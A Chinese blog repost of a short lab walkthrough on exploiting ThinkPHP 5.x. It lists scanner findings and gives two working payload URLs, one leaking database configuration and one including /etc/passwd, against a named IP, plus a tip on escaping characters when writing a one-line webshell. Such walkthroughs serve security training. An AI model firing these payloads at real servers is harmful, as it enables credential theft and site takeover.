当前位置: 首页 > article >正文

常见框架漏洞攻略-ThinkPHP篇

漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场

第二步:准备工具

第三步:启动工具,进行漏洞检测

#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞

2.目标存在tp5_dbinfo_leak漏洞
  payload:
  http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
  hostname: 127.0.0.1, hostport: , database: , username: , password: root
  
3.目标存在tp5_file_include漏洞
  payload: 
  http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞

第五步:查看tp5_file_include漏洞

第六步:尝试GetShell

注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

                                                                                                                        FROM  IYU_


http://www.kler.cn/a/599169.html

相关文章:

  • 搜广推校招面经五十七
  • C语言入门教程100讲(40)文件定位
  • search_fields与filterset_fields的使用
  • 【参考资料 II】C 运算符大全:算术、关系、赋值、逻辑、条件、指针、符号、成员、按位、混合运算符
  • 多线程编程
  • 模糊数学 | 模型 / 集合 / 关系 / 矩阵
  • endnote相关资料记录
  • V8引擎源码编译踩坑实录
  • vue3 如何清空 let arr = reactive([])
  • React Native集成到现有原生Android应用
  • WebGPU实战:Three.js性能优化新纪元
  • SpringMVC请求和响应
  • 练习题:101
  • 腾讯云大模型知识引擎x deepseek:打造智能服装搭配新体验
  • 详解Spark executor
  • vue中keep-alive组件的使用
  • DeepSeek 助力 Vue3 开发:打造丝滑的表格(Table)之添加导出数据功能示例14,TableView15_14多功能组合的导出表格示例
  • C++——权限初识
  • 炫酷的3D卡片翻转画廊实现教程
  • 使用ES支持树状结构查询实战